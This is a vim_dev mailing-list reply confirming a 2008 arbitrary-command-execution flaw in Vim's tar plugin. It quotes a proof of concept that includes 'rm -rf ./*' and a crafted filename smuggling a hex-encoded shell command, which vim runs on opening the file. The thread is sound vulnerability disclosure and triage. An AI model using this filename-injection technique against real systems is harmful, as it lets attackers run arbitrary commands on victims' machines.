On 02/07/08 02:26, Jan Minář wrote:
> Looks like this didn't go through, so here it is again:
[...]
> The updated tarplugin attack is rather simple:
>
> $ rm -rf ./*
> $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
> xxd -r\`;'bar.tar"
> $ vim +:q ./foo*
> $ ls -l pwned
> -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
>
> Cheers,
> Jan Minar.
I'm seeing this too. Looks like vulnerability to executing arbitrary
shell commands via a specially crafted "tarfile" (which can be
zero-length as here) with an unusual name. The maintainer of the suspect
script ($VIMRUNTIME/plugin/tarPlugin.vim and/or
$VIMRUNTIME/autoload/tar.vim) would be Dr.Chip; I think he's reading
these groups but I'm adding him as a Bcc just in case (Dr. Chip, sorry
if you got two copies of this post). FWIW, I'm using tarPlugin.vim v16
(date not mentioned) and tar.vim v16 (dated Jun 12, 2008) on gvim 7.2a.11
Best regards,
Tony.
--
Bureaucrat, n.:
A person who cuts red tape sideways.
-- J. McCabe
--~--~---------~--~----~------------~-------~--~----~
You received this message from the "vim_dev" maillist.
For more information, visit http://www.vim.org/maillist.php
-~----------~----~----~----~------~----~------~--~---
